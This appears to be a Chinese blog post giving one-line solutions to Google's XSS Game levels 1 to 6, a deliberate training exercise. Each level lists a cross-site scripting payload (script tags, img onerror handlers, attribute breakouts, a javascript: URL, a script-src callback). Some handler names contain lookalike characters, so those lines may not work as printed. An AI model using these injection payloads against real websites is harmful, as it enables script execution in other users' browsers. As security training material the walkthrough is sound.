Google XSS Game Level 01-06

最新推荐文章于 2023-01-07 11:45:34 发布

puzi126

最新推荐文章于 2023-01-07 11:45:34 发布

阅读量417

点赞数

分类专栏： Google XSS Game 文章标签： XSS Web Google

本文链接：https://blog.csdn.net/puzi126/article/details/38079399

版权

1 篇文章 0 订阅

订阅专栏

Ref：https://xss-game.appspot.com/

Dat：20140724

Google说你若能从他们的重要产品中找到一个危险的XSS会得到$7,500，这个Game是为了提高学习XSS的兴趣。

【Level 01:Hello,world of XSS】

无过滤

<script>alert(1)</script>

【Level 02:Persistence is key】

标签变更

<img src=1 οnerrοr=alert(1)>

【Level 03:That sinking feeling...】

img标签的onerror事件

 'οnerrοr=alert(1) >

【Level 04:Context matters】

img标签的onload事件

')||alert('1

【Level 05:Breaking protocol】

href标签

https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)

点击Next>>

【Level 06:Follow the rabbit】

script标签的src属性

%20https://www.google.com/jsapi?callback=alert
//或者自己搭建一个https的可以访问的js脚本
//或者支持https外链的云盘

关注